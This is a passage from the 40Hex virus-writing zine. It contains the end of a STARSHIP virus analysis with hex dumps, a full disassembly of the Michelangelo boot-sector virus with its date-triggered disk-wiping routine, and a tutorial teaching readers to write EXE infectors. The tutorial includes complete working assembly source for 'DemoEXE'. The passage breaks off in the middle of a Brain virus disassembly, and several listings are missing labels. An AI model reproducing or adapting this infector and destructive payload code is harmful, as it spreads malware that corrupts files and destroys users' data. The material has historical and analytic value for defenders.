40Hex Number 8 Volume 2 Issue 4

Table 1. Layout and size of virus procedures.
(the box indicates the encrypted memory section)

  Size    Offset (hex)             Description

    3%    000 - 04F      Variables and buffers (see Fig.1)
    5%    050 - 0C1      Interrupt 13h handler
   10%    0C2 - 1C7      Interrupt 21h handler
   11%    1C8 - 312      Active part & check for DOS ready
    2%    313 - 340      Random number generator (RND)
    7%    341 - 3F7      Interrupts 20h, 21h, 27h handlers
 +--- encrypted --------------------------------------------+
 | 25%    3F8 - 692      Infector of EXE/COM file includes: |
 |     9%      3F8 - 4DD      input logic                   |
 |    10%      4DE - 5E9      create infected code          |
 |     6%      5EA - 692      output logic                  |
 |  3%    693 - 6E5      Tables                             |
 |  3%    6E6 - 738      Startup code for EXE/COM           |
 | 12%    739 - 88F      Infect disk                        |
 |  2%    891 - 8BF      Interrupt 01h handler (trace)      |
 | 11%    8C0 - 9D7      PseudoDOS boot and int B0h handler |
    4%    9D8 - A4E      Remover of code from videomemory
    2%    A4F - A8F      Buffers (CS, IP, SS, SP, etc.)


Table 2. Minimal and maximal sizes of infected
executable files.
       |  File type  |    Minimal   Maximal   |
       |             |    size      size      |
       |             |                        |
       |   .COM      |    1917      62202     |
       |             |                        |
       |   .EXE      |    1917      512 K     |


Figure 1. Memory block header (M-block) and memory dump of STARSHIP
virus located in core RAM. Virus uses segment 18FB, and its memory
block is at 18F2:0).

------------------- M-memory block containing virus --------------------------

18F2:0000  4D 08 00 B0 00 0A 00 A3-8E 0B A1 0C 00 A3 90 0B   M...............

------- PSP of file, which termination caused the virus installation ---------

18F3:0000  CD 20 A3 19 00 9A F0 FE-1D F0 2F 01 0B 18 3C 01   . ......../...<.
18F3:0010  0B 18 56 05 0B 18 0B 18-01 01 01 00 02 FF FF FF   ..V.............
18F3:0020  FF FF FF FF FF FF FF FF-FF FF FF FF EE 18 E0 FF   ................
18F3:0030  00 90 14 00 18 00 F3 18-FF FF FF FF 00 00 00 00   ................
18F3:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18F3:0050  CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20   .!...........
18F3:0060  20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20           .....
18F3:0070  20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00           ........

------------------ Here follows the code of virus (CS=18FB) -----------------

18FB:0000  E9 01 10 4E 0A 00 10 00-00 00 00 00 00 42 3A 5C   ...N.........B:\
18FB:0010  54 4D 50 5C 44 52 4F 5A-46 49 4C 41 2E 43 4F 4D   TMP\DROZFILA.COM
18FB:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18FB:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
18FB:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 FF   ................
18FB:0050  E9 93 06 3E 53 54 41 52-53 48 49 50 5F 31 3C 80   ...>STARSHIP_1<.
18FB:0060  FA 80 75 41 83 F9 01 75-3F 0A F6 75 38 80 FC 02   ..uA...u?..u8...
18FB:0070  75 29 1E 50 E8 13 03 58-9C FF 1E B8 04 1F 72 18   u).P...X......r.
18FB:0080  50 56 72 16 B8 01 00 BE-BE 01 26 89 40 02 B0 01   PVr.......&.@...
18FB:0090  26 88 40 01 5E 58 F8 FB-EB 7C 3C 80 FC 03 74 F6   &.@.^X...|<...t.
18FB:00A0  80 FC 05 74 F1 E9 3E 01-80 FE 08 75 F8 51 02 C8   ...t..>....u.Q..
18FB:00B0  80 F9 CC 59 72 EF 80 FD-FE 72 EA 80 FC 02 74 D6   ...Yr....r....t.
18FB:00C0  75 D9 FF F1 E8 9C 2E 80-3E 4F 00 00 75 18 50 1E   u.......>O..u.P.
18FB:00D0  8C C8 2D 09 00 E8 A9 02-A1 3C 00 48 E8 A2 02 2E   ..-......<.H....
18FB:00E0  F6 16 4F 00 1F 58 80 FC-3C 75 31 2E 83 3E 0B 00   ..O..X....
18FB:00F0  00 75 6E E8 6E 00 75 69-9D E8 CC 00 72 18 50 51   .un.n.ui....r.PQ


Figure 2. Dump of pseudoDOS boot sector
(thin line denotes random garbage).

   0000  EB 34 90 4D 53 BF 05 00-CD 13 73 09 32 E4 CD 13   .4.MS.....s.2...
   0010  4F 75 F5 CD 18 C3 B9 01-00 E8 E9 FF 80 3E 00 7E   Ou...........>.~
   0020  EB 75 10 A0 02 7E BB 00-7E E8 97 00 0A E4 74 03   .u...~..~.....t.
   0030  80 EF 02 06 53 CB FA 33-C0 8E D0 BC 00 7C 8B F4   ....S..3.....|..
   0040  8E C0 8E D8 FB FC BF 00-06 B9 00 01 F3 A5 EA 53   ...............S
   0050  06 00 00 B9 37 00 BE D6-06 BF C0 02 F3 A4 BF B0   ....7...........
   0060  04 B9 08 00 F3 A4 1E C5-06 4C 00 AB 8C D8 AB 1F   .........L......
   0070  FE 06 FC 7D A1 FC 7D B9-CC FE BB 00 7C BA 80 08   ...}..}.....|...
   0080  0A C0 74 08 50 B8 01 03-E8 7A FF 58 41 89 0E DB   ..t.P....z.XA...
   0090  02 88 36 DF 02 06 BB 00-BB 8E C3 88 26 E7 02 CD   ..6.........&...
   00A0  B0 26 A2 63 01 26 8C 1E-C2 00 07 FA C7 06 4C 00   .&.c.&........L.
   00B0  B0 04 8C 1E 4E 00 FB BB-00 7C B8 06 02 BA 80 00   ....N....|......
   00C0  E9 53 FF 53 51 B9 0A 0A-32 E4 26 30 07 26 02 27   .S.SQ...2.&0.&.'
   00D0  43 E2 F7 59 5B C3 C4 02-00 00 50 06 53 B8 00 BB   C..Y[.....P.S...
   00E0  8E C0 BB 50 00 26 80 3F-E9 74 1E 52 51 B8 05 02   ...P.&.?.t.RQ...
   00F0  B9 00 00 BA 80 00 9C 2E-FF 1E B8 04 B0 00 B9 0A   ................
   0100  0A 26 30 07 43 E2 FA 59-5A 5B 07 58 CF CD B0 9A   .&0.C..YZ[.X....
   0110  5F 00 00 BB EA|1E 0E 1F-8E C0 33 FF 50 FC 32 C0|  _.........3.P.2.
  +--------------------+                                |
  |0120  B9 50 00 F3 AA E8 F6 F7-8B F7 B9 0A 0A F3 A4 E8|  .P..............
  |0130  98 F9 58 FA A3 B5 04 A3-C1 04 B8 90 90 A3 B0 04|  ..X.............
  |0140  A3 BC 04 C7 06 BF 04 C5-00 B8 EB 05 A3 C8 04 B8|  ................
  |0150  EB F4 A3 D4 04 BF CA 04-BE DB 04 06 1E 07 A5 A5|  ................
  |0160  A4 FB A3 D9 04 A3 C8 02-C7 06 E0 02 CD 13 C7 06|  ................
  |0170  E2 02 EB 0D FE 06 D9 02-CD B0 B9 37 00 BF C0 02|  ...........7....
  |0180  1E 07 8C D8 F3 AA 07 1F-C3 B4 62 E8 7A F7 C3 90|  ..........b.z...
  |0190  90 90 90 90 90 90 90 90-90 90 A4 4B 4C EA A6 8C|  ...........KL...
  |01A0  BE 23 54 F4 BC E8 B8 6B-5B F1 B2 EC B2 81 5E F6|  .#T....k[.....^.
  |01B0  88 D0 8C BC 64 CC 8E CC-86 69 6A C2 84 C8 80 6F|  ....d....ij....o
  |01C0  FA 2B C0 8E D0 8E C0 8E-D8 B8 00 7C 8B E0 FB 8B|  .+.........|....
  |01D0  F0 BF 00 7E FC B9 00 01-F3 A5 E9 00 02 B9 10 00|  ...~............
  |01E0  8B 36 85 7E F6 04 80 75-08 83 EE 10 E2 F6 EB 37|  .6.~...u.......7
  |                                   +-----------------+
  |01F0  90 BF BE 07 57 B9 08 00-F3 A5|74 91 05 AD 55 AA   ....W.....t...U.

Figure 3. Dispatcher code located at absolute address 0:4B0.

        a) virus code located in videomemory

0000:04B0  CD B0              INT  B0        <== int 13h
0000:04B2  9A 5F 00 00 BB     CALL BB00:005F
0000:04B7  EA 3D A3 00 F0     JMP  F000:A33D

0000:04BC  CD B0              INT  B0        <== int 21h
0000:04BE  9A D6 03 00 BB     CALL BB00:03D6
0000:04C3  EA 60 14 73 02     JMP  0273:1460

0000:04C8  CD B0              INT  B0        <== int 20h
0000:04CA  9A DD 03 00 BB     CALL BB00:03DD
0000:04CF  EA 3F 14 73 02     JMP  0273:143F

0000:04D4  CD B0              INT  B0        <== int 27h
0000:04D6  9A 93 03 00 BB     CALL BB00:0393
0000:04DB  EA 66 63 73 02     JMP  0273:6366

        b) after removing of code from videomemory
           (segment CS=18FB is where virus resides)

0000:04B0  90                 NOP            <== int 13h
0000:04B1  90                 NOP
0000:04B2  9A 5F 00 6D 19     CALL 18FB:005F
0000:04B7  EA 3D A3 00 F0     JMP  F000:A33D

0000:04BC  90                 NOP            <== int 21h
0000:04BD  90                 NOP
0000:04BE  9A C5 00 6D 19     CALL 18FB:00C5
0000:04C3  EA 3D A3 00 F0     JMP  0273:1460

0000:04C8  EB 05              JMP  4CF       <== int 20h
0000:04CA  EA 3F 14 73 02     JMP  0273:143F
0000:04CF  EA 66 63 73 02     JMP  0273:6366
0000:04D4  EB F4              JMP  4CA       <== int 27h

All  corrections and  remarks will be greatly appreciated. Send
information directly via E-mail address (MIG@politon.msk.su) or
in  comp.virus group of USENET (I am monitoring it permanently).

F   .rs mbyt-  tF   .rs mbyt-  tF   .  (What is this? -Ed.)
40Hex Number 8 Volume 2 Issue 4                                       File 006

; This is a disassembly of the much-hyped michelangelo virus.
; As you can see, it is a derivative of the Stoned virus.  The
; junk bytes at the end of the file are probably throwbacks to
; the Stoned virus.  In any case, it is yet another boot sector
; and partition table infector.

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
; Disassembly by Dark Angel of PHALCON/SKISM
                org     0

                jmp     entervirus
highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h

                push    ds
                push    ax
                or      dl, dl                  ; default drive?
                jnz     exitint13h              ; exit if not
                xor     ax, ax
                mov     ds, ax
                test    byte ptr ds:[43fh], 1   ; disk 0 on?
                jnz     exitint13h              ; if not spinning, exit
                pop     ax
                pop     ds
                call    dword ptr cs:[oldint13h]; first call old int 13h
                call    infectdisk              ; then infect
                retf    2
exitint13h:     pop     ax
                pop     ds
                jmp     dword ptr cs:[oldint13h]

                push    ax
                push    bx
                push    cx
                push    dx
                push    ds
                push    es
                push    si
                push    di
                push    cs
                pop     ds
                push    cs
                pop     es
                mov     si, 4
                mov     ax,201h                 ; Read boot block to
                mov     bx,200h                 ; after virus
                mov     cx,1
                xor     dx,dx
                call    oldint13h
                jnc     checkinfect             ; continue if no error
                xor     ax,ax
                call    oldint13h               ; Reset disk
                dec     si                      ; loop back
                jnz     readbootblock
                jmp     short quitinfect        ; exit if too many failures
                xor     si,si
                cmp     ax,[bx]                 ; check if already infected
                jne     infectitnow
                cmp     ax,[bx+2]               ; check again
                je      quitinfect
                mov     ax,301h                 ; Write old boot block
                mov     dh,1                    ; to head 1
                mov     cl,3                    ; sector 3
                cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
                je      is360Kdisk
                mov     cl,0Eh
                mov     firstsector,cx
                call    oldint13h
                jc      quitinfect              ; exit on error
                mov     si,200h+offset partitioninfo
                mov     di,offset partitioninfo
                mov     cx,21h                  ; Copy partition table
                rep     movsw
                mov     ax,301h                 ; Write virus to sector 1
                xor     bx,bx
                mov     cx,1
                xor     dx,dx
                call    oldint13h
                pop     di
                pop     si
                pop     es
                pop     ds
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                xor     ax,ax
                mov     ds,ax
                mov     ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
                dec     ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
                mov     ax,offset int13h
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
                mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
                jmp     dword ptr cs:[7C00h+offset highmemjmp]
; destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                int     13h                     ; reset disk
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
                jne     floppyboot              ; if not, do floppies
                mov     dx,80h                  ; Read old partition table of
                int     13h                     ; first hard disk to 0:7C00h
                jmp     short exitvirus
                mov     cx,firstsector          ; read old boot block
                mov     dx,100h                 ; to 0:7C00h
                int     13h
                jc      exitvirus
                push    cs
                pop     es
                mov     ax,201h                 ; read boot block
                mov     bx,200h                 ; of first hard disk
                mov     cx,1
                mov     dx,80h
                int     13h
                jc      exitvirus
                xor     si,si
                cmp     ax,[bx]                 ; is it infected?
                jne     infectharddisk          ; if not, infect HD
                lodsw                           ; check infection
                cmp     ax,[bx+2]
                jne     infectharddisk
                xor     cx,cx                   ; Real time clock get date
                mov     ah,4                    ; dx = mon/day
                int     1Ah
                cmp     dx,306h                 ; March 6th
                je      damagestuff
                retf                            ; return control to original
                                                ; boot block @ 0:7C00h
                xor     dx,dx
                mov     cx,1
                mov     ax,309h
                mov     si,firstsector
                cmp     si,3
                je      smashit
                mov     al,0Eh
                cmp     si,0Eh
                je      smashit
                mov     dl,80h                  ; first hard disk
                mov     maxhead,4
                mov     al,11h
                mov     bx,5000h                ; random memory area
                mov     es,bx                   ; at 5000h:5000h
                int     13h                     ; Write al sectors to drive dl
                jnc     skiponerror             ; skip on error
                xor     ah,ah                   ; Reset disk drive dl
                int     13h
                inc     dh                      ; next head
                cmp     dh,maxhead              ; 2 if floppy, 4 if HD
                jb      smashanothersector
                xor     dh,dh                   ; go to next head/cylinder
                inc     ch
                jmp     short smashanothersector
                mov     cx,7                    ; Write partition table to
                mov     firstsector,cx          ; sector 7
                mov     ax,301h
                mov     dx,80h
                int     13h
                jc      exitvirus
                mov     si,200h+offset partitioninfo ; Copy partition
                mov     di,offset partitioninfo      ; table information
                mov     cx,21h
                rep     movsw
                mov     ax,301h                 ; Write to sector 8
                xor     bx,bx                   ; Copy virus to sector 1
                inc     cl
                int     13h
;*              jmp     short 01E0h
                db      0EBh, 32h               ; ?This should crash?
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends

40Hex Number 8 Volume 2 Issue 4                                       File 007

                    An Introduction to Nonoverwriting Virii
                            Part II: EXE Infectors
                                 By Dark Angel
       In the  last issue  of 40Hex,  I presented  theory and  code  for  the
  nonoverwriting  COM   infector,  the   simplest  of  all  parasitic  virii.
  Hopefully, having  learned COM  infections cold,  you are now ready for EXE
  infections.  There is a grey veil covering the technique of EXE infections,
  as the majority of virii are COM-only.
       EXE infections  are, in  some  respects,  simpler  than  COM  viruses.
  However, to  understand the infection, you must understand the structure of
  EXE files  (naturally).   EXE files  are structured into segments which are
  loaded consecutively  atop one  another.  Thus, all an EXE infector must do
  is create  its own  segment in  the EXE  file and  alter  the  entry  point
  appropriately.   Therefore, EXE  infections do  not require  restoration of
  bytes of  code, but  rather involve  the manipulation  of the  header which
  appears in  the beginning every EXE file and the appending of viral code to
  the infected file.  The format of the header follows:
   Offset Description
     00   ID word, either 'MZ' or 'ZM'
     02   Number of bytes in the last (512 byte) page in the image
     04   Total number of 512 byte pages in the file
     06   Number of entries in the segment table
     08   Size of the header in (16 byte) paragraphs
     0A   Minimum memory required in paragraphs
     0C   Maximum memory requested in paragraphs
     0E   Initial offset in paragraphs to stack segment from header
     10   Initial offset in bytes of stack pointer from stack segment
     12   Negative checksum (ignored)
     14   Initial offset in bytes of instruction pointer from code segment
     16   Initial offset in paragraphs of code segment from header
     18   Offset of relocation table from start of file
     1A   Overlay number (ignored)
  The ID  word is  generally 'ZM'  (in the  Intel little-endian format).  Few
  files start  with the  alternate form,  'MZ' (once  again in  Intel little-
  endian format).   To  save space, a check for the alternate form of the EXE
  ID in  the virus  may be omitted, although a few files may be corrupted due
  to this omission.
  The words  at offsets  2 and  4 are related.  The word at offset 4 contains
  the filesize  in pages.   A  page is  a 512 byte chunk of memory, just as a
  word is  a two  byte chunk of memory.  This number is rounded up, so a file
  of length  514 bytes  would contain a 2 at offset 4 in the EXE header.  The
  word at offset 2 is the image length modulo 512.  The image length does not
  include the  header length.   This  is one of the bizarre quirks of the EXE
  header.   Since the header length is usually a multiple of 512 anyway, this
  quirk usually  does not  matter.  If the word at offset 2 is equal to four,
  then it  is generally  ignored (heck,  it's never really used anyway) since
  pre-1.10 versions  of the  Microsoft linker had a bug which caused the word
  to always  be equal  to four.  If you are bold, the virus can set this word
  to 4.   However, keep in mind that this was a bug of the linker and not all
  command interpreters may recognise this quirk.
  The minimum memory required by the program (offset A) can be ignored by the
  virus, as  the maximum  memory is generally allocated to the program by the
  operating system.   However,  once again,  ignoring this area of the header
  MAY cause  an unsucessful  infection.   Simply adding  the  virus  size  in
  paragraphs to this value can nullify the problem.
  The words  representing the  initial stack segment and pointer are reversed
  (not in  little-endian format).   In  other words,  an LES to this location
  will yield  the stack  pointer in  ES and  the  stack  segment  in  another
  register.   The initial  SS:SP is  calculated  with  the  base  address  of
  0000:0000 being at the end of the header.
  Similarly, the  initial CS:IP  (in little-endian format) is calculated with
  the base  address of  0000:0000 at  the end of the header.  For example, if
  the program  entry point  appears directly after the header, then the CS:IP
  would be 0000:0000.  When the program is loaded, the PSP+10 is added to the
  segment value (the extra 10 accounts for the 100h bytes of the PSP).
  All the  relevant portions  of the  EXE header  have been covered.  So what
  should be  done to  write a  nonoverwriting EXE infector?  First, the virus
  must be appended to the end of the file.  Second, the initial CS:IP must be
  saved and  subsequently changed  in the  header.   Third, the initial SS:SP
  should also  be saved  and changed.   This  is to avoid any possible memory
  conflicts from  the stack  overwriting viral  code.   Fourth, the file size
  area of  the header should be modified to correctly reflect the new size of
  the file.   Fifth,  any additional  safety modifications such as increasing
  the minimum  memory allocation  should be made.  Last, the header should be
  written to the infected file.
  There are  several good areas for ID bytes in the EXE header.  The first is
  in the stack pointer field.  Since it should be changed anyway, changing it
  to a  predictable number  would add nothing to the code length.  Make sure,
  however, to  make the stack pointer high enough to prevent code overwrites.
  Another common  area for ID bytes is in the negative checksum field.  Since
  it is  an unused  field, altering  it won't  affect the  execution  of  any
  One further item should be mentioned before the code for the EXE infector.
  It is important to remember that EXE files are loaded differently than COM
  files.  Although a PSP is still built, the initial CS does NOT point to it.
  Instead, it points to wherever the entry point happens to be.  DS and ES
  point to the PSP, and therefore do NOT point to the entry point (your virus
  code).  It is important to restore DS and ES to their proper values before
  returning control to the EXE.
  ----cut here---------------------------------------------------------------
  .model tiny                             ; Handy TASM directive
  .code                                   ; Virus code segment
            org 100h                      ; COM file starting IP
  ; Cheesy EXE infector
  ; Written by Dark Angel of PHALCON/SKISM
  ; For 40Hex Number 8 Volume 2 Issue 4
  id = 'DA'                               ; ID word for EXE infections
  startvirus:                             ; virus code starts here
            call next                     ; calculate delta offset
  next:     pop  bp                       ; bp = IP next
            sub  bp,offset next           ; bp = delta offset
            push ds
            push es
            push cs                       ; DS = CS
            pop  ds
            push cs                       ; ES = CS
            pop  es
            lea  si,[bp+jmpsave2]
            lea  di,[bp+jmpsave]
            mov  ah,1Ah                   ; Set new DTA
            lea  dx,[bp+newDTA]           ; new DTA @ DS:DX
            int  21h
            lea  dx,[bp+exe_mask]
            mov  ah,4eh                   ; find first file
            mov  cx,7                     ; any attribute
            int  21h                      ; DS:DX points to mask
            jc   done_infections          ; No mo files found
            mov  al,0h                    ; Open read only
            call open
            mov  ah,3fh                   ; Read file to buffer
            lea  dx,[bp+buffer]           ; @ DS:DX
            mov  cx,1Ah                   ; 1Ah bytes
            int  21h
            mov  ah,3eh                   ; Close file
            int  21h
  checkEXE: cmp  word ptr [bp+buffer+10h],id ; is it already infected?
            jnz  infect_exe
            mov  ah,4fh                   ; find next file
            jmp  short findfirstnext
            mov  ah,1ah                   ; restore DTA to default
            mov  dx,80h                   ; DTA in PSP
            pop  es
            pop  ds                       ; DS->PSP
            int  21h
            mov  ax,es                    ; AX = PSP segment
            add  ax,10h                   ; Adjust for PSP
            add  word ptr cs:[si+jmpsave+2],ax
            add  ax,word ptr cs:[si+stacksave+2]
            cli                           ; Clear intrpts for stack manip.
            mov  sp,word ptr cs:[si+stacksave]
            mov  ss,ax
            db   0eah                     ; jmp ssss:oooo
  jmpsave             dd ?                ; Original CS:IP
  stacksave           dd ?                ; Original SS:SP
  jmpsave2            dd 0fff00000h       ; Needed for carrier file
  stacksave2          dd ?
  creator             db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0
  virusname           db '[DemoEXE] for 40Hex',0
            les  ax, dword ptr [bp+buffer+14h] ; Save old entry point
            mov  word ptr [bp+jmpsave2], ax
            mov  word ptr [bp+jmpsave2+2], es
            les  ax, dword ptr [bp+buffer+0Eh] ; Save old stack
            mov  word ptr [bp+stacksave2], es
            mov  word ptr [bp+stacksave2+2], ax
            mov  ax, word ptr [bp+buffer + 8] ; Get header size
            mov  cl, 4                        ; convert to bytes
            shl  ax, cl
            xchg ax, bx
            les  ax, [bp+offset newDTA+26]; Get file size
            mov  dx, es                   ; to DX:AX
            push ax
            push dx
            sub  ax, bx                   ; Subtract header size from
            sbb  dx, 0                    ; file size
            mov  cx, 10h                  ; Convert to segment:offset
            div  cx                       ; form
            mov  word ptr [bp+buffer+14h], dx ; New entry point
            mov  word ptr [bp+buffer+16h], ax
            mov  word ptr [bp+buffer+0Eh], ax ; and stack
            mov  word ptr [bp+buffer+10h], id
            pop  dx                       ; get file length
            pop  ax
            add  ax, heap-startvirus      ; add virus size
            adc  dx, 0
            mov  cl, 9                    ; 2**9 = 512
            push ax
            shr  ax, cl
            ror  dx, cl
            adc  dx, ax                   ; filesize in pages
            pop  ax
            and  ah, 1                    ; mod 512
            mov  word ptr [bp+buffer+4], dx ; new file size
            mov  word ptr [bp+buffer+2], ax
            push cs                       ; restore ES
            pop  es
            mov  cx, 1ah
            push cx                       ; Save # bytes to write
            xor  cx,cx                    ; Clear attributes
            call attributes               ; Set file attributes
            mov  al,2
            call open
            mov  ah,40h                   ; Write to file
            lea  dx,[bp+buffer]           ; Write from buffer
            pop  cx                       ; cx bytes
            int  21h
            mov  ax,4202h                 ; Move file pointer
            xor  cx,cx                    ; to end of file
            cwd                           ; xor dx,dx
            int  21h
            mov  ah,40h                   ; Concatenate virus
            lea  dx,[bp+startvirus]
            mov  cx,heap-startvirus       ; # bytes to write
            int  21h
            mov  ax,5701h                 ; Restore creation date/time
            mov  cx,word ptr [bp+newDTA+16h] ; time
            mov  dx,word ptr [bp+newDTA+18h] ; date
            int  21h
            mov  ah,3eh                   ; Close file
            int  21h
            mov ch,0
            mov cl,byte ptr [bp+newDTA+15h] ; Restore original
            call attributes                 ; attributes
  mo_infections: jmp find_next
            mov  ah,3dh
            lea  dx,[bp+newDTA+30]        ; filename in DTA
            int  21h
            xchg ax,bx
            mov  ax,4301h                 ; Set attributes to cx
            lea  dx,[bp+newDTA+30]        ; filename in DTA
            int  21h
  exe_mask            db '*.exe',0
  heap:                                   ; Variables not in code
  newDTA              db 42 dup (?)       ; Temporary DTA
  buffer              db 1ah dup (?)      ; read buffer
  endheap:                                ; End of virus
  end       startvirus
  ----cut here---------------------------------------------------------------
  This is a simple EXE infector.  It has limitations; for example, it does
  not handle misnamed COM files.  This can be remedied by a simple check:
    cmp [bp+buffer],'ZM'
    jnz misnamed_COM
  Take special notice of the done_infections and infect_exe procedures.  They
  handle all  the relevant portions of the EXE infection.  The restoration of
  the EXE  file simply  consists of  resetting the stack and a far jmp to the
  original entry point.
  A final  note on  EXE infections: it is often helpful to "pad" EXE files to
  the nearest  segment.  This accomplishes two things.  First, the initial IP
  is  always  0,  a  fact  which  can  be  used  to  eliminate  delta  offset
  calculations.   Code space  can be  saved by  replacing all  those annoying
  relative memory  addressing statements  ([bp+offset blip])  statements with
  their absolute  counterparts (blip).   Second, recalculation of header info
  can be  handled in  paragraphs, simplifying  it tremendously.  The code for
  this is left as an exercise for the reader.
  This file is dedicated to the [XxXX] (Censored. -Ed.) programmers (who have
  yet to figure out how to  write EXE  infectors).  Hopefully, this  text can
  teach them (and everyone else) how to progress beyond simple COM and spawn-
  ing EXE infectors.   In the next issue of 40Hex,  I will present the theory
  and code for the next step of file infector - the coveted SYS file.
40Hex Number 8 Volume 2 Issue 4                                       File 008

; This is the ashar variant of the classic Pakistani Brain virus. It is large
; by today's standards, although it was one of the first.  It is a floppy only
; boot sector infector.

brain           segment byte public
                assume  cs:brain, ds:brain
; Disassembly done by Dark Angel of PHALCON/SKISM
                org     0

                jmp     entervirus
idbytes         db       34h, 12h
firsthead       db      0
firstsector     dw      2707h
curhead         db      0
cursector       dw      1
                db      0, 0, 0, 0
                db      'Welcome to the  Dungeon         '
copyright       db      '(c) 1986 Brain'
                db      17h
                db      '& Amjads (pvt) Ltd   VIRUS_SHOE '
                db      ' RECORD   v9.0   Dedicated to th'
                db      'e dynamic memories of millions o'
                db      'f virus who are no longer with u'
                db      's today - Thanks GOODNESS!!     '
                db      '  BEWARE OF THE er..VIRUS  : \th'
                db      'is program is catching      prog'
                db      'ram follows after these messeges'
                db      '..... $'
                db      '#@%$'
                db      '@!! '
                mov     ax,cs
                mov     ds,ax                   ; ds = 0
                mov     ss,ax                   ; set stack to after
                mov     sp,0F000h               ; virus
                mov     al,ds:[7C00h+offset firsthead]
                mov     ds:[7C00h+offset curhead],al
                mov     cx,ds:[7C00h+offset firstsector]
                mov     ds:[7C00h+offset cursector],cx
                call    calcnext
                mov     cx,5                    ; read five sectors
                mov     bx,7C00h+200h           ; after end of virus

                call    readdisk
                call    calcnext
                add     bx,200h
                loop    loadnext

                mov     ax,word ptr ds:[413h]   ; Base memory size in Kb
                sub     ax,7                    ; - 7 Kb
                mov     word ptr ds:[413h],ax   ; Insert as new value
                mov     cl,6
                shl     ax,cl                   ; Convert to paragraphs
                mov     es,ax
                mov     si,7C00h                ; Copy from virus start
                mov     di,0                    ; to start of memory
                mov     cx,1004h                ; Copy 1004h bytes
                rep     movsb
                push    es
                mov     ax,200h
                push    ax
                retf                            ; return to old boot sector

                push    cx
                push    bx
                mov     cx,4                    ; Try 4 times

                push    cx
                mov     dh,ds:[7C00h+offset curhead]
                mov     dl,0                    ; Read sector from default
                mov     cx,ds:[7C00h+offset cursector]
                mov     ax,201h                 ; Disk to memory at es:bx
                int     13h
                jnc     readOK
                mov     ah,0                    ; Reset disk
                int     13h                     ; (force read track 0)
                pop     cx
                loop    tryread

                int     18h                     ; ROM basic on failure
                pop     cx
                pop     bx
                pop     cx

                mov     al,byte ptr ds:[7C00h+offset cursector]
                inc     al
                mov     byte ptr ds:[7C00h+offset cursector],al
                cmp     al,0Ah
                jne     donecalc
                mov     byte ptr ds:[7C00h+offset cursector],1
                mov     al,ds:[7C00h+offset curhead]
                inc     al
                mov     ds:[7C00h+offset curhead],al
                cmp     al,2
                jne     donecalc
                mov     byte ptr ds:[7C00h+offset curhead],0
                inc     byte ptr ds:[7C00h+offset cursector+1]

; the following is a collection of garbage bytes
                db       00h, 00h, 00h, 00h, 32h,0E3h
                db       23h, 4Dh, 59h,0F4h,0A1h, 82h
                db      0BCh,0C3h, 12h, 00h, 7Eh, 12h
                db      0CDh, 21h,0A2h, 3Ch, 5Fh
a_data          dw      050Ch
; Second part of the virus begins here
                jmp     short entersecondpart
                db      '(c) 1986 Brain & Amjads (pvt) Ltd ',0
readcounter     db      4                       ; keep track of # reads
curdrive        db      0
int13flag       db      0

                mov     cs:readcounter,1Fh
                xor     ax,ax
                mov     ds,ax                   ; ds -> interrupt table
                mov     ax,ds:[13h*4]
                mov     ds:[6Dh*4],ax
                mov     ax,ds:[13h*4+2]
                mov     ds:[6Dh*4+2],ax
                mov     ax,offset int13         ; 276h
                mov     ds:[13h*4],ax
                mov     ax,cs
                mov     ds:[13h*4+2],ax
                mov     cx,4                    ; 4 tries
                xor     ax,ax
                mov     es,ax                   ; es -> interrupt table

                push    cx
                mov     dh,cs:firsthead
                mov     dl,0
                mov     cx,cs:firstsector
                mov     ax,201h                 ; read from default disk
                mov     bx,7C00h
                int     6Dh                     ; int 13h
                jnc     readbootOK
                mov     ah,0
                int     6Dh                     ; int 13h
                pop     cx
                loop    tryreadbootsector

                int     18h                     ; ROM basic on failure
readbootOK:                                     ; return control to
                                                ; original boot sector
;*              jmp     far ptr 0000:7C00h
                db      0EAh, 00h, 7Ch, 00h, 00h
                nop                             ; MASM NOP!!!
                cmp     ah,2                    ; if not read request,
                jne     doint13                 ; do not go further
                cmp     dl,2                    ; if after second floppy,
                ja      doint13                 ; do not go further
                cmp     ch,0                    ; if not reading boot sector,
                jne     regularread             ; go handle as usual
                cmp     dh,0                    ; if boot sector,
                je      readboot                ; do I<-/>/\|> stuff
                dec     cs:readcounter          ; Infect after 4 reads
                jnz     doint13                 ; If counter still OK, don't
                                                ; do anything else
                jmp     short readboot          ; Otherwise, try to infect
                jmp     exitint13h
                mov     cs:int13flag,0          ; clear flag
                mov     cs:readcounter,4        ; reset counter
                push    ax
                push    bx
                push    cx
                push    dx
                mov     cs:curdrive,dl
                mov     cx,4

                push    cx
                mov     ah,0                    ; Reset disk
                int     6Dh
                jc      errorreadingbootblock   ; Try again
                mov     dh,0
                mov     cx,1
